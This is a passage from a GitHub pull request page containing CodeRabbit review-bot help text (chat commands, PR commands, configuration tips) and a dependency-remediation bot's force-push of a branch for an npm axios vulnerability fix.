    • @coderabbitai gather interesting stats about this repository and render them as a table. Additionally, render a pie chart showing the language distribution in the codebase.
    • @coderabbitai read src/utils.ts and generate unit testing code.
    • @coderabbitai read the files in the src/scheduler package and generate a class diagram using mermaid and a README in the markdown format.
    • @coderabbitai help me debug CodeRabbit configuration file.

Note: Be mindful of the bot's finite context window. It's strongly recommended to break down tasks such as reading entire modules into smaller chunks. For a focused discussion, use review comments to chat about specific files and their changes, instead of using the PR comments.

CodeRabbit Commands (Invoked using PR comments)

  • @coderabbitai pause to pause the reviews on a PR.
  • @coderabbitai resume to resume the paused reviews.
  • @coderabbitai review to trigger an incremental review. This is useful when automatic reviews are disabled for the repository.
  • @coderabbitai full review to do a full review from scratch and review all the files again.
  • @coderabbitai summary to regenerate the summary of the PR.
  • @coderabbitai generate docstrings to generate docstrings for this PR.
  • @coderabbitai resolve resolve all the CodeRabbit review comments.
  • @coderabbitai configuration to show the current CodeRabbit configuration for the repository.
  • @coderabbitai help to get help.

Other keywords and placeholders

  • Add @coderabbitai ignore anywhere in the PR description to prevent this PR from being reviewed.
  • Add @coderabbitai summary to generate the high-level summary at a specific location in the PR description.
  • Add @coderabbitai anywhere in the PR title to generate the title automatically.

CodeRabbit Configuration File (.coderabbit.yaml)

  • You can programmatically configure CodeRabbit by adding a .coderabbit.yaml file to the root of your repository.
  • Please see the configuration documentation for more information.
  • If your editor has YAML language server enabled, you can add the path at the top of this file to enable auto-completion and validation: # yaml-language-server: $schema=https://coderabbit.ai/integrations/schema.v2.json

Documentation and Community

  • Visit our Documentation for detailed information on how to use CodeRabbit.
  • Join our Discord Community to get help, request features, and share feedback.
  • Follow us on X/Twitter for updates and announcements.

Signed-off-by: mend-on-mend[bot] <mend-on-mend[bot]@users.noreply.github.com>
@mend-on-mend mend-on-mend bot force-pushed the whitesource-remediate/npm-axios-vulnerability branch from 79ad0d6 to d0c125f Compare March 12, 2025 23:46
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

Successfully merging this pull request may close these issues.

0 participants